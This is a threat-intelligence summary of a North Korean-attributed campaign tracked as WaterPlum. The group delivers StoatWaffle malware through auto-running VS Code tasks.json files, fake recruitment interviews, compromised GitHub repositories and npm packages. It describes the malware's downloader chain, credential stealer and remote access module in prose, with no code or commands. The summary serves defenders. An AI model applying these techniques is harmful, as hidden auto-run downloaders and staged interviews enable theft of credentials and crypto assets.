Key Findings

• North Korean threat actors tracked as WaterPlum are distributing StoatWaffle malware through malicious VS Code projects using the "tasks.json" auto-run feature

• The malware automatically executes when any file in a project folder is opened, with downloads occurring regardless of operating system

• StoatWaffle includes a credential stealer targeting browsers and a remote access trojan for command execution

• Attackers are targeting senior engineers, CTOs, and founders in crypto and Web3 sectors through fake recruitment interviews

• Recent campaigns show evolving tactics moving away from Vercel to GitHub Gist for payload delivery

• Related attacks have compromised Neutralinojs GitHub repositories and distributed malware through npm packages

Background

The Contagious Interview campaign, attributed to North Korean threat actors and tracked as WaterPlum, has been operating for years but significantly expanded their malware distribution methods in December 2025. The group is known for impersonating legitimate companies during recruitment processes to gain access to developer systems. Their targets aren't junior developers but rather high-value individuals like founders and CTOs in the cryptocurrency sector who have access to sensitive infrastructure and digital assets. The shift to VS Code projects represents a new vector in their evolving arsenal of attack methods.

StoatWaffle Malware Architecture

StoatWaffle is built on Node.js and operates as a modular platform. When a malicious VS Code project is opened, the tasks.json file triggers automatic execution that downloads and installs Node.js if it's not present on the system. The malware then launches a downloader that communicates with external servers to retrieve next-stage payloads, creating a chain of downloaders that execute received code as Node.js scripts. This modular design allows operators to deploy different functionality depending on campaign objectives.

Stealer and Remote Access Capabilities

The malware deploys two primary modules. The stealer component targets credentials and sensitive data stored in Chromium-based browsers and Firefox, with additional capability to steal iCloud Keychain databases on macOS systems. All stolen data gets uploaded to command-and-control servers. The RAT module enables operators to change directories, enumerate files, execute arbitrary code and commands, upload files, search for files matching keywords, and terminate the malware. Together, these modules provide comprehensive system compromise and data exfiltration capabilities.

Social Engineering and Initial Access

Attackers use convincingly staged recruitment processes that mirror legitimate technical interviews to trick developers into running malicious commands or packages. Victims are approached both directly and through LinkedIn, but targets are specifically chosen for their elevated access to company infrastructure and cryptocurrency assets. Recent examples show attempted targeting of company founders, with victims being asked to execute commands or download repositories hosted on GitHub, GitLab, or Bitbucket as part of the fake interview assessment.

Broader Campaign Operations

WaterPlum's activities extend beyond StoatWaffle. The PolinRider campaign injected malicious JavaScript into hundreds of public GitHub repositories, including four belonging to the Neutralinojs organization, to deploy a new variant of BeaverTail stealer. Attackers compromised a long-time contributor account with organization-level write access to force-push malicious code that retrieves encrypted payloads from blockchain transactions. Separately, malicious npm packages have been used to distribute PylangGhost malware, marking the first npm-based propagation of this family.

Evolving Tradecraft and Related Malware

The threat actors have demonstrated active refinement of their methods. Newer VS Code project variants have shifted from using Vercel-based domains to GitHub Gist-hosted scripts for payload delivery, suggesting learning from defensive detections. Related malware families deployed in these campaigns include OtterCookie, InvisibleFerret, and FlexibleFerret, which exist in multiple programming language variants including Go and Python implementations. The group continues developing and updating malware families regularly, indicating an active and well-resourced operation.

Sources

• https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

• https://x.com/shah_sheikh/status/2036161567079698566

• https://x.com/TheHackersNews/status/2036144058033381433

• https://x.com/shah_sheikh/status/2036161863407505842/photo/1